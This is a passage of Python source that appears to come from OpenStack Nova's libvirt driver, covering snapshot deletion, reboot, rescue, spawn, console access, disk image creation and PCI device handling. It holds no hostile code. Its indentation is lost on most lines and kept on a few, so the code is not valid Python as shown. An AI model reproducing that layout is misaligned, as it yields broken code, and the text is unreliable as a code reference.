raise exception.NovaException(msg)
try:
virt_dom = self._lookup_by_name(instance.name)
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance.uuid)
# Find dev name
my_dev = None
active_disk = None
xml = virt_dom.XMLDesc(0)
xml_doc = etree.fromstring(xml)
device_info = vconfig.LibvirtConfigGuest()
device_info.parse_dom(xml_doc)
active_disk_object = None
for guest_disk in device_info.devices:
if (guest_disk.root_name != 'disk'):
continue
if (guest_disk.target_dev is None or guest_disk.serial is None):
continue
if guest_disk.serial == volume_id:
my_dev = guest_disk.target_dev
active_disk = guest_disk.source_path
active_protocol = guest_disk.source_protocol
active_disk_object = guest_disk
break
if my_dev is None or (active_disk is None and active_protocol is None):
msg = _('Disk with id: %s '
'not found attached to instance.') % volume_id
LOG.debug('Domain XML: %s', xml)
raise exception.NovaException(msg)
LOG.debug("found device at %s", my_dev)
def _get_snap_dev(filename, backing_store):
if filename is None:
msg = _('filename cannot be None')
raise exception.NovaException(msg)
# libgfapi delete
LOG.debug("XML: %s" % xml)
LOG.debug("active disk object: %s" % active_disk_object)
# determine reference within backing store for desired image
filename_to_merge = filename
matched_name = None
b = backing_store
index = None
current_filename = active_disk_object.source_name.split('/')[1]
if current_filename == filename_to_merge:
return my_dev + '[0]'
while b is not None:
source_filename = b.source_name.split('/')[1]
if source_filename == filename_to_merge:
                    LOG.debug('found match: %s', b.source_name)
matched_name = b.source_name
index = b.index
break
b = b.backing_store
if matched_name is None:
msg = _('no match found for %s') % (filename_to_merge)
raise exception.NovaException(msg)
            LOG.debug('index of match (%s) is %s', b.source_name, index)
my_snap_dev = '%s[%s]' % (my_dev, index)
return my_snap_dev
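        # _get_snap_dev() yields libvirt's indexed disk notation (a
        # hypothetical 'vda[1]'), which lets blockRebase/blockCommit address
        # a single image within a network-backed (e.g. gluster) chain.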
if delete_info['merge_target_file'] is None:
# pull via blockRebase()
# Merge the most recent snapshot into the active image
rebase_disk = my_dev
rebase_flags = 0
rebase_base = delete_info['file_to_merge'] # often None
if active_protocol is not None:
rebase_base = _get_snap_dev(delete_info['file_to_merge'],
active_disk_object.backing_store)
rebase_bw = 0
LOG.debug('disk: %(disk)s, base: %(base)s, '
'bw: %(bw)s, flags: %(flags)s',
{'disk': rebase_disk,
'base': rebase_base,
'bw': rebase_bw,
'flags': rebase_flags})
result = virt_dom.blockRebase(rebase_disk, rebase_base,
rebase_bw, rebase_flags)
if result == 0:
LOG.debug('blockRebase started successfully')
while self._wait_for_block_job(virt_dom, my_dev,
abort_on_error=True):
LOG.debug('waiting for blockRebase job completion')
time.sleep(0.5)
else:
# commit with blockCommit()
my_snap_base = None
my_snap_top = None
commit_disk = my_dev
commit_flags = 0
if active_protocol is not None:
my_snap_base = _get_snap_dev(delete_info['merge_target_file'],
active_disk_object.backing_store)
my_snap_top = _get_snap_dev(delete_info['file_to_merge'],
active_disk_object.backing_store)
try:
commit_flags |= libvirt.VIR_DOMAIN_BLOCK_COMMIT_RELATIVE
except AttributeError:
ver = '.'.join(
[str(x) for x in
MIN_LIBVIRT_BLOCKCOMMIT_RELATIVE_VERSION])
msg = _("Relative blockcommit support was not detected. "
"Libvirt '%s' or later is required for online "
"deletion of network storage-backed volume "
"snapshots.") % ver
raise exception.Invalid(msg)
commit_base = my_snap_base or delete_info['merge_target_file']
commit_top = my_snap_top or delete_info['file_to_merge']
bandwidth = 0
            LOG.debug('will call blockCommit with commit_disk=%(commit_disk)s '
                      'commit_base=%(commit_base)s '
                      'commit_top=%(commit_top)s',
                      {'commit_disk': commit_disk,
                       'commit_base': commit_base,
                       'commit_top': commit_top})
result = virt_dom.blockCommit(commit_disk, commit_base, commit_top,
bandwidth, commit_flags)
if result == 0:
LOG.debug('blockCommit started successfully')
while self._wait_for_block_job(virt_dom, my_dev,
abort_on_error=True):
LOG.debug('waiting for blockCommit job completion')
time.sleep(0.5)
def volume_snapshot_delete(self, context, instance, volume_id, snapshot_id,
delete_info):
try:
self._volume_snapshot_delete(context, instance, volume_id,
snapshot_id, delete_info=delete_info)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Error occurred during '
'volume_snapshot_delete, '
'sending error status to Cinder.'))
self._volume_snapshot_update_status(
context, snapshot_id, 'error_deleting')
self._volume_snapshot_update_status(context, snapshot_id, 'deleting')
self._volume_refresh_connection_info(context, instance, volume_id)
def reboot(self, context, instance, network_info, reboot_type,
block_device_info=None, bad_volumes_callback=None):
"""Reboot a virtual machine, given an instance reference."""
if reboot_type == 'SOFT':
# NOTE(vish): This will attempt to do a graceful shutdown/restart.
try:
soft_reboot_success = self._soft_reboot(instance)
except libvirt.libvirtError as e:
LOG.debug("Instance soft reboot failed: %s", e)
soft_reboot_success = False
if soft_reboot_success:
LOG.info(_LI("Instance soft rebooted successfully."),
instance=instance)
return
else:
LOG.warn(_LW("Failed to soft reboot instance. "
"Trying hard reboot."),
instance=instance)
return self._hard_reboot(context, instance, network_info,
block_device_info)
def _soft_reboot(self, instance):
"""Attempt to shutdown and restart the instance gracefully.
We use shutdown and create here so we can return if the guest
responded and actually rebooted. Note that this method only
succeeds if the guest responds to acpi. Therefore we return
success or failure so we can fall back to a hard reboot if
necessary.
:returns: True if the reboot succeeded
"""
dom = self._lookup_by_name(instance["name"])
state = LIBVIRT_POWER_STATE[dom.info()[0]]
old_domid = dom.ID()
# NOTE(vish): This check allows us to reboot an instance that
# is already shutdown.
if state == power_state.RUNNING:
dom.shutdown()
# NOTE(vish): This actually could take slightly longer than the
# FLAG defines depending on how long the get_info
# call takes to return.
self._prepare_pci_devices_for_use(
pci_manager.get_instance_pci_devs(instance))
for x in xrange(CONF.libvirt.wait_soft_reboot_seconds):
dom = self._lookup_by_name(instance["name"])
state = LIBVIRT_POWER_STATE[dom.info()[0]]
new_domid = dom.ID()
            # NOTE(ivoks): By checking domain IDs, we make sure we are
            #              not recreating a domain that's already running.
if old_domid != new_domid:
if state in [power_state.SHUTDOWN,
power_state.CRASHED]:
LOG.info(_LI("Instance shutdown successfully."),
instance=instance)
self._create_domain(domain=dom)
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running, instance)
timer.start(interval=0.5).wait()
return True
else:
LOG.info(_LI("Instance may have been rebooted during soft "
"reboot, so return now."), instance=instance)
return True
greenthread.sleep(1)
return False
def _hard_reboot(self, context, instance, network_info,
block_device_info=None):
"""Reboot a virtual machine, given an instance reference.
Performs a Libvirt reset (if supported) on the domain.
If Libvirt reset is unavailable this method actually destroys and
re-creates the domain to ensure the reboot happens, as the guest
OS cannot ignore this action.
"""
self._destroy(instance)
# Get the system metadata from the instance
system_meta = utils.instance_sys_meta(instance)
# Convert the system metadata to image metadata
image_meta = utils.get_image_from_system_metadata(system_meta)
if not image_meta:
image_ref = instance.get('image_ref')
image_meta = compute_utils.get_image_metadata(context,
self._image_api,
image_ref,
instance)
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info,
image_meta)
# NOTE(vish): This could generate the wrong device_format if we are
# using the raw backend and the images don't exist yet.
# The create_images_and_backing below doesn't properly
# regenerate raw backend images, however, so when it
# does we need to (re)generate the xml after the images
# are in place.
xml = self._get_guest_xml(context, instance, network_info, disk_info,
image_meta=image_meta,
block_device_info=block_device_info,
write_to_disk=True)
# NOTE (rmk): Re-populate any missing backing files.
disk_info_json = self._get_instance_disk_info(instance['name'], xml,
block_device_info)
instance_dir = libvirt_utils.get_instance_path(instance)
self._create_images_and_backing(context, instance, instance_dir,
disk_info_json)
# Initialize all the necessary networking, block devices and
# start the instance.
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info, reboot=True,
vifs_already_plugged=True)
self._prepare_pci_devices_for_use(
pci_manager.get_instance_pci_devs(instance))
def _wait_for_reboot():
"""Called at an interval until the VM is running again."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_LI("Instance rebooted successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_reboot)
timer.start(interval=0.5).wait()
def pause(self, instance):
"""Pause VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.suspend()
def unpause(self, instance):
"""Unpause paused VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.resume()
def power_off(self, instance):
"""Power off the specified instance."""
self._destroy(instance)
def power_on(self, context, instance, network_info,
block_device_info=None):
"""Power on the specified instance."""
# We use _hard_reboot here to ensure that all backing files,
# network, and block device connections, etc. are established
# and available before we attempt to start the instance.
self._hard_reboot(context, instance, network_info, block_device_info)
def suspend(self, instance):
"""Suspend the specified instance."""
dom = self._lookup_by_name(instance['name'])
self._detach_pci_devices(dom,
pci_manager.get_instance_pci_devs(instance))
dom.managedSave(0)
def resume(self, context, instance, network_info, block_device_info=None):
"""resume the specified instance."""
xml = self._get_existing_domain_xml(instance, network_info,
block_device_info)
dom = self._create_domain_and_network(context, xml, instance,
network_info, block_device_info=block_device_info,
vifs_already_plugged=True)
self._attach_pci_devices(dom,
pci_manager.get_instance_pci_devs(instance))
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""resume guest state when a host is booted."""
# Check if the instance is running already and avoid doing
# anything if it is.
try:
domain = self._lookup_by_name(instance['name'])
state = LIBVIRT_POWER_STATE[domain.info()[0]]
ignored_states = (power_state.RUNNING,
power_state.SUSPENDED,
power_state.NOSTATE,
power_state.PAUSED)
if state in ignored_states:
return
except exception.NovaException:
pass
# Instance is not up and could be in an unknown state.
# Be as absolute as possible about getting it back into
# a known and running state.
self._hard_reboot(context, instance, network_info, block_device_info)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Loads a VM using rescue images.
A rescue is normally performed when something goes wrong with the
primary images and data needs to be corrected/recovered. Rescuing
        should not edit or override the original image, only allow for
data recovery.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml = self._get_existing_domain_xml(instance, network_info)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
libvirt_utils.write_to_file(unrescue_xml_path, unrescue_xml)
if image_meta is not None:
rescue_image_id = image_meta.get('id')
else:
rescue_image_id = None
rescue_images = {
'image_id': (rescue_image_id or
CONF.libvirt.rescue_image_id or instance.image_ref),
'kernel_id': (CONF.libvirt.rescue_kernel_id or
instance.kernel_id),
'ramdisk_id': (CONF.libvirt.rescue_ramdisk_id or
instance.ramdisk_id),
}
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
None,
image_meta,
rescue=True)
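        # Build throw-away '.rescue' disks from the rescue image and boot
        # the guest from them; the original disks and the saved unrescue.xml
        # stay untouched so unrescue() can restore the instance later.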
self._create_image(context, instance,
disk_info['mapping'],
'.rescue', rescue_images,
network_info=network_info,
admin_pass=rescue_password)
xml = self._get_guest_xml(context, instance, network_info, disk_info,
image_meta, rescue=rescue_images,
write_to_disk=True)
self._destroy(instance)
self._create_domain(xml)
def unrescue(self, instance, network_info):
"""Reboot the VM which is being rescued back into primary images.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
xml = libvirt_utils.load_file(unrescue_xml_path)
virt_dom = self._lookup_by_name(instance.name)
self._destroy(instance)
self._create_domain(xml, virt_dom)
libvirt_utils.file_delete(unrescue_xml_path)
rescue_files = os.path.join(instance_dir, "*.rescue")
for rescue_file in glob.iglob(rescue_files):
libvirt_utils.file_delete(rescue_file)
def poll_rebooting_instances(self, timeout, instances):
pass
def _enable_hairpin(self, xml):
interfaces = self._get_interfaces(xml)
for interface in interfaces:
utils.execute('tee',
'/sys/class/net/%s/brport/hairpin_mode' % interface,
process_input='1',
run_as_root=True,
check_exit_code=[0, 1])
# NOTE(ilyaalekseyev): Implementation like in multinics
# for xenapi(tr3buchet)
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info,
image_meta)
self._create_image(context, instance,
disk_info['mapping'],
network_info=network_info,
block_device_info=block_device_info,
files=injected_files,
admin_pass=admin_password)
xml = self._get_guest_xml(context, instance, network_info,
disk_info, image_meta,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info)
LOG.debug("Instance is running", instance=instance)
def _wait_for_boot():
"""Called at an interval until the VM is running."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_LI("Instance spawned successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_boot)
timer.start(interval=0.5).wait()
def _flush_libvirt_console(self, pty):
out, err = utils.execute('dd',
'if=%s' % pty,
'iflag=nonblock',
run_as_root=True,
check_exit_code=False)
return out
def _append_to_file(self, data, fpath):
LOG.info(_LI('data: %(data)r, fpath: %(fpath)r'),
{'data': data, 'fpath': fpath})
with open(fpath, 'a+') as fp:
fp.write(data)
return fpath
def get_console_output(self, context, instance):
virt_dom = self._lookup_by_name(instance.name)
xml = virt_dom.XMLDesc(0)
tree = etree.fromstring(xml)
console_types = {}
# NOTE(comstud): We want to try 'file' types first, then try 'pty'
# types. We can't use Python 2.7 syntax of:
# tree.find("./devices/console[@type='file']/source")
# because we need to support 2.6.
console_nodes = tree.findall('./devices/console')
for console_node in console_nodes:
console_type = console_node.get('type')
console_types.setdefault(console_type, [])
console_types[console_type].append(console_node)
# If the guest has a console logging to a file prefer to use that
if console_types.get('file'):
for file_console in console_types.get('file'):
source_node = file_console.find('./source')
if source_node is None:
continue
path = source_node.get("path")
if not path:
continue
libvirt_utils.chown(path, os.getuid())
with libvirt_utils.file_open(path, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp,
MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_LI('Truncated console log returned, '
'%d bytes ignored'), remaining,
instance=instance)
return log_data
# Try 'pty' types
if console_types.get('pty'):
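            # The for/else below picks the first pty console exposing a
            # source path; the else branch runs only when no usable pty was
            # found, in which case we raise.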
for pty_console in console_types.get('pty'):
source_node = pty_console.find('./source')
if source_node is None:
continue
pty = source_node.get("path")
if not pty:
continue
break
else:
msg = _("Guest does not have a console available")
raise exception.NovaException(msg)
self._chown_console_log_for_instance(instance)
data = self._flush_libvirt_console(pty)
console_log = self._get_console_log_path(instance)
fpath = self._append_to_file(data, console_log)
with libvirt_utils.file_open(fpath, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp, MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_LI('Truncated console log returned, '
'%d bytes ignored'),
remaining, instance=instance)
return log_data
@staticmethod
def get_host_ip_addr():
return CONF.my_ip
def get_vnc_console(self, context, instance):
def get_vnc_port_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
dom = xmlutils.safe_minidom_parse_string(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'vnc':
return graphic.getAttribute('port')
# NOTE(rmk): We had VNC consoles enabled but the instance in
# question is not actually listening for connections.
raise exception.ConsoleTypeUnavailable(console_type='vnc')
port = get_vnc_port_for_instance(instance.name)
host = CONF.vncserver_proxyclient_address
return {'host': host, 'port': port, 'internal_access_path': None}
def get_spice_console(self, context, instance):
def get_spice_ports_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
# TODO(sleepsonthefloor): use etree instead of minidom
dom = xmlutils.safe_minidom_parse_string(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'spice':
return (graphic.getAttribute('port'),
graphic.getAttribute('tlsPort'))
# NOTE(rmk): We had Spice consoles enabled but the instance in
# question is not actually listening for connections.
raise exception.ConsoleTypeUnavailable(console_type='spice')
ports = get_spice_ports_for_instance(instance['name'])
host = CONF.spice.server_proxyclient_address
return {'host': host, 'port': ports[0],
'tlsPort': ports[1], 'internal_access_path': None}
@staticmethod
def _supports_direct_io(dirpath):
if not hasattr(os, 'O_DIRECT'):
LOG.debug("This python runtime does not support direct I/O")
return False
testfile = os.path.join(dirpath, ".directio.test")
hasDirectIO = True
try:
f = os.open(testfile, os.O_CREAT | os.O_WRONLY | os.O_DIRECT)
            # Check if a write is allowed with 512-byte alignment
align_size = 512
m = mmap.mmap(-1, align_size)
m.write(r"x" * align_size)
os.write(f, m)
os.close(f)
LOG.debug("Path '%(path)s' supports direct I/O",
{'path': dirpath})
except OSError as e:
if e.errno == errno.EINVAL:
LOG.debug("Path '%(path)s' does not support direct I/O: "
"'%(ex)s'", {'path': dirpath, 'ex': str(e)})
hasDirectIO = False
else:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error on '%(path)s' while checking "
"direct I/O: '%(ex)s'"),
{'path': dirpath, 'ex': str(e)})
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error on '%(path)s' while checking direct I/O: "
"'%(ex)s'"), {'path': dirpath, 'ex': str(e)})
finally:
try:
os.unlink(testfile)
except Exception:
pass
return hasDirectIO
@staticmethod
def _create_local(target, local_size, unit='G',
fs_format=None, label=None):
"""Create a blank image of specified size."""
libvirt_utils.create_image('raw', target,
'%d%c' % (local_size, unit))
def _create_ephemeral(self, target, ephemeral_size,
fs_label, os_type, is_block_dev=False,
max_size=None, specified_fs=None):
if not is_block_dev:
self._create_local(target, ephemeral_size)
# Run as root only for block devices.
disk.mkfs(os_type, fs_label, target, run_as_root=is_block_dev,
specified_fs=specified_fs)
@staticmethod
def _create_swap(target, swap_mb, max_size=None):
"""Create a swap file of specified size."""
libvirt_utils.create_image('raw', target, '%dM' % swap_mb)
utils.mkfs('swap', target)
@staticmethod
def _get_console_log_path(instance):
return os.path.join(libvirt_utils.get_instance_path(instance),
'console.log')
@staticmethod
def _get_disk_config_path(instance, suffix=''):
return os.path.join(libvirt_utils.get_instance_path(instance),
'disk.config' + suffix)
def _chown_console_log_for_instance(self, instance):
console_log = self._get_console_log_path(instance)
if os.path.exists(console_log):
libvirt_utils.chown(console_log, os.getuid())
def _chown_disk_config_for_instance(self, instance):
disk_config = self._get_disk_config_path(instance)
if os.path.exists(disk_config):
libvirt_utils.chown(disk_config, os.getuid())
@staticmethod
def _is_booted_from_volume(instance, disk_mapping):
"""Determines whether the VM is booting from volume
Determines whether the disk mapping indicates that the VM
is booting from a volume.
"""
return ((not bool(instance.get('image_ref')))
or 'disk' not in disk_mapping)
def _inject_data(self, instance, network_info, admin_pass, files, suffix):
"""Injects data in a disk image
Helper used for injecting data in a disk image file system.
Keyword arguments:
          instance -- a dict that refers to instance specifications
          network_info -- a dict that refers to network specifications
          admin_pass -- a string used to set an admin password
          files -- a list of files that need to be injected
suffix -- a string used as an image name suffix
"""
        # Handle which partition needs to be used.
target_partition = None
if not instance['kernel_id']:
target_partition = CONF.libvirt.inject_partition
if target_partition == 0:
target_partition = None
if CONF.libvirt.virt_type == 'lxc':
target_partition = None
# Handles the key injection.
if CONF.libvirt.inject_key and instance.get('key_data'):
key = str(instance['key_data'])
else:
key = None
# Handles the admin password injection.
if not CONF.libvirt.inject_password:
admin_pass = None
# Handles the network injection.
net = netutils.get_injected_network_template(
network_info, libvirt_virt_type=CONF.libvirt.virt_type)
# Handles the metadata injection
metadata = instance.get('metadata')
image_type = CONF.libvirt.images_type
if any((key, net, metadata, admin_pass, files)):
injection_image = self.image_backend.image(
instance,
'disk' + suffix,
image_type)
img_id = instance['image_ref']
if not injection_image.check_image_exists():
LOG.warn(_LW('Image %s not found on disk storage. '
'Continue without injecting data'),
injection_image.path, instance=instance)
return
try:
disk.inject_data(injection_image.path,
key, net, metadata, admin_pass, files,
partition=target_partition,
use_cow=CONF.use_cow_images,
mandatory=('files',))
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Error injecting data into image '
'%(img_id)s (%(e)s)'),
{'img_id': img_id, 'e': e},
instance=instance)
def _create_image(self, context, instance,
disk_mapping, suffix='',
disk_images=None, network_info=None,
block_device_info=None, files=None,
admin_pass=None, inject_files=True):
if not suffix:
suffix = ''
booted_from_volume = self._is_booted_from_volume(
instance, disk_mapping)
def image(fname, image_type=CONF.libvirt.images_type):
return self.image_backend.image(instance,
fname + suffix, image_type)
def raw(fname):
return image(fname, image_type='raw')
# ensure directories exist and are writable
fileutils.ensure_tree(libvirt_utils.get_instance_path(instance))
LOG.info(_LI('Creating image'), instance=instance)
# NOTE(dprince): for rescue console.log may already exist... chown it.
self._chown_console_log_for_instance(instance)
# NOTE(yaguang): For evacuate disk.config already exist in shared
# storage, chown it.
self._chown_disk_config_for_instance(instance)
        # NOTE(vish): No need to add the suffix to console.log
libvirt_utils.write_to_file(
self._get_console_log_path(instance), '', 7)
if not disk_images:
disk_images = {'image_id': instance['image_ref'],
'kernel_id': instance['kernel_id'],
'ramdisk_id': instance['ramdisk_id']}
if disk_images['kernel_id']:
fname = imagecache.get_cache_fname(disk_images, 'kernel_id')
raw('kernel').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['kernel_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
if disk_images['ramdisk_id']:
fname = imagecache.get_cache_fname(disk_images, 'ramdisk_id')
raw('ramdisk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['ramdisk_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
inst_type = flavors.extract_flavor(instance)
# NOTE(ndipanov): Even if disk_mapping was passed in, which
# currently happens only on rescue - we still don't want to
# create a base image.
if not booted_from_volume:
root_fname = imagecache.get_cache_fname(disk_images, 'image_id')
size = instance['root_gb'] * units.Gi
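            # A root_gb of 0 or a rescue disk means the backend keeps the
            # image's native virtual size instead of resizing it.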
if size == 0 or suffix == '.rescue':
size = None
backend = image('disk')
if backend.SUPPORTS_CLONE:
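                # Backends that support cloning (e.g. rbd) try a direct
                # clone from the image service first and fall back to a
                # regular fetch if the image cannot be cloned.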
def clone_fallback_to_fetch(*args, **kwargs):
try:
backend.clone(context, disk_images['image_id'])
except exception.ImageUnacceptable:
libvirt_utils.fetch_image(*args, **kwargs)
fetch_func = clone_fallback_to_fetch
else:
fetch_func = libvirt_utils.fetch_image
backend.cache(fetch_func=fetch_func,
context=context,
filename=root_fname,
size=size,
image_id=disk_images['image_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
# Lookup the filesystem type if required
os_type_with_default = disk.get_fs_type_for_os_type(
instance['os_type'])
ephemeral_gb = instance['ephemeral_gb']
if 'disk.local' in disk_mapping:
disk_image = image('disk.local')
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral0',
os_type=instance["os_type"],
is_block_dev=disk_image.is_block_dev)
fname = "ephemeral_%s_%s" % (ephemeral_gb, os_type_with_default)
size = ephemeral_gb * units.Gi
disk_image.cache(fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=ephemeral_gb)
for idx, eph in enumerate(driver.block_device_info_get_ephemerals(
block_device_info)):
disk_image = image(blockinfo.get_eph_disk(idx))
specified_fs = eph.get('guest_format')
if specified_fs and not self.is_supported_fs_format(specified_fs):
msg = _("%s format is not supported") % specified_fs
raise exception.InvalidBDMFormat(details=msg)
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral%d' % idx,
os_type=instance["os_type"],
is_block_dev=disk_image.is_block_dev)
size = eph['size'] * units.Gi
fname = "ephemeral_%s_%s" % (eph['size'], os_type_with_default)
disk_image.cache(
fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=eph['size'],
specified_fs=specified_fs)
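        # A swap device attached via the block device mapping takes
        # precedence over the flavor's swap size.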
if 'disk.swap' in disk_mapping:
mapping = disk_mapping['disk.swap']
swap_mb = 0
swap = driver.block_device_info_get_swap(block_device_info)
if driver.swap_is_usable(swap):
swap_mb = swap['swap_size']
elif (inst_type['swap'] > 0 and
not block_device.volume_in_mapping(
mapping['dev'], block_device_info)):
swap_mb = inst_type['swap']
if swap_mb > 0:
size = swap_mb * units.Mi
image('disk.swap').cache(fetch_func=self._create_swap,
filename="swap_%s" % swap_mb,
size=size,
swap_mb=swap_mb)
# Config drive
if configdrive.required_by(instance):
LOG.info(_LI('Using config drive'), instance=instance)
extra_md = {}
if admin_pass:
extra_md['admin_pass'] = admin_pass
inst_md = instance_metadata.InstanceMetadata(instance,
content=files, extra_md=extra_md, network_info=network_info)
with configdrive.ConfigDriveBuilder(instance_md=inst_md) as cdb:
configdrive_path = self._get_disk_config_path(instance, suffix)
LOG.info(_LI('Creating config drive at %(path)s'),
{'path': configdrive_path}, instance=instance)
try:
cdb.make_drive(configdrive_path)
except processutils.ProcessExecutionError as e:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Creating config drive failed '
'with error: %s'),
e, instance=instance)
# File injection only if needed
elif inject_files and CONF.libvirt.inject_partition != -2:
if booted_from_volume:
LOG.warn(_LW('File injection into a boot from volume '
'instance is not supported'), instance=instance)
self._inject_data(
instance, network_info, admin_pass, files, suffix)
if CONF.libvirt.virt_type == 'uml':
libvirt_utils.chown(image('disk').path, 'root')
def _prepare_pci_devices_for_use(self, pci_devices):
        # kvm and qemu support managed mode
# In managed mode, the configured device will be automatically
# detached from the host OS drivers when the guest is started,
# and then re-attached when the guest shuts down.
if CONF.libvirt.virt_type != 'xen':
# we do manual detach only for xen
return
try:
for dev in pci_devices:
libvirt_dev_addr = dev['hypervisor_name']
libvirt_dev = \
self._conn.nodeDeviceLookupByName(libvirt_dev_addr)
# Note(yjiang5) Spelling for 'dettach' is correct, see
# http://libvirt.org/html/libvirt-libvirt.html.
libvirt_dev.dettach()
# Note(yjiang5): A reset of one PCI device may impact other
# devices on the same bus, thus we need two separated loops
# to detach and then reset it.
for dev in pci_devices:
libvirt_dev_addr = dev['hypervisor_name']
libvirt_dev = \
self._conn.nodeDeviceLookupByName(libvirt_dev_addr)
libvirt_dev.reset()
except libvirt.libvirtError as exc:
raise exception.PciDevicePrepareFailed(id=dev['id'],
instance_uuid=
dev['instance_uuid'],
reason=str(exc))
def _detach_pci_devices(self, dom, pci_devs):
        # for libvirt versions < 1.1.1 this is a race condition,
        # so forbid detach unless we have at least that version
if not self._has_min_version(MIN_LIBVIRT_DEVICE_CALLBACK_VERSION):
if pci_devs:
reason = (_("Detaching PCI devices with libvirt < %(ver)s"
" is not permitted") %
{'ver': MIN_LIBVIRT_DEVICE_CALLBACK_VERSION})
raise exception.PciDeviceDetachFailed(reason=reason,
dev=pci_devs)
try:
for dev in pci_devs:
dom.detachDeviceFlags(self._get_guest_pci_device(dev).to_xml(),
libvirt.VIR_DOMAIN_AFFECT_LIVE)
# after detachDeviceFlags returned, we should check the dom to
# ensure the detaching is finished
xml = dom.XMLDesc(0)
xml_doc = etree.fromstring(xml)
guest_config = vconfig.LibvirtConfigGuest()
guest_config.parse_dom(xml_doc)
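                # Compare the remaining hostdev addresses numerically, since
                # the XML represents them as hex strings; a match means the
                # device is still attached and the detach timed out.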
for hdev in [d for d in guest_config.devices
if isinstance(d, vconfig.LibvirtConfigGuestHostdevPCI)]:
hdbsf = [hdev.domain, hdev.bus, hdev.slot, hdev.function]
dbsf = pci_utils.parse_address(dev['address'])
if [int(x, 16) for x in hdbsf] ==\
[int(x, 16) for x in dbsf]:
raise exception.PciDeviceDetachFailed(reason=
"timeout",
dev=dev)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_LW("Instance disappeared while detaching "
"a PCI device from it."))
else:
raise
def _attach_pci_devices(self, dom, pci_devs):
try:
for dev in pci_devs:
dom.attachDevice(self._get_guest_pci_device(dev).to_xml())
except libvirt.libvirtError:
LOG.error(_LE('Attaching PCI devices %(dev)s to %(dom)s failed.'),
{'dev': pci_devs, 'dom': dom.ID()})
raise
def _set_host_enabled(self, enabled,
disable_reason=DISABLE_REASON_UNDEFINED):
"""Enables / Disables the compute service on this host.
This doesn't override non-automatic disablement with an automatic
        setting, thereby permitting operators to keep otherwise
healthy hosts out of rotation.
"""
status_name = {True: 'disabled',
False: 'enabled'}
disable_service = not enabled
ctx = nova_context.get_admin_context()
try:
service = objects.Service.get_by_compute_host(ctx, CONF.host)
if service.disabled != disable_service:
# Note(jang): this is a quick fix to stop operator-
# disabled compute hosts from re-enabling themselves
# automatically. We prefix any automatic reason code
# with a fixed string. We only re-enable a host
# automatically if we find that string in place.
# This should probably be replaced with a separate flag.
if not service.disabled or (
service.disabled_reason and
service.disabled_reason.startswith(DISABLE_PREFIX)):
service.disabled = disable_service
service.disabled_reason = (
DISABLE_PREFIX + disable_reason
if disable_service else DISABLE_REASON_UNDEFINED)
service.save()
LOG.debug('Updating compute service status to %s',
status_name[disable_service])
else:
LOG.debug('Not overriding manual compute service '
'status with: %s',
status_name[disable_service])
except exception.ComputeHostNotFound:
LOG.warn(_LW('Cannot update service status on host: %s,'
'since it is not registered.'), CONF.host)
except Exception:
LOG.warn(_LW('Cannot update service status on host: %s,'
'due to an unexpected exception.'), CONF.host,
exc_info=True)
def _get_host_capabilities(self):
"""Returns an instance of config.LibvirtConfigCaps representing
the capabilities of the host.
"""
if not self._caps:
xmlstr = self._conn.getCapabilities()
self._caps = vconfig.LibvirtConfigCaps()
self._caps.parse_str(xmlstr)
if hasattr(libvirt, 'VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES'):
try:
features = self._conn.baselineCPU(
[self._caps.host.cpu.to_xml()],
libvirt.VIR_CONNECT_BASELINE_CPU_EXPAND_FEATURES)
# FIXME(wangpan): the return value of baselineCPU should be
# None or xml string, but libvirt has a bug
# of it from 1.1.2 which is fixed in 1.2.0,
# this -1 checking should be removed later.
if features and features != -1:
cpu = vconfig.LibvirtConfigCPU()
cpu.parse_str(features)
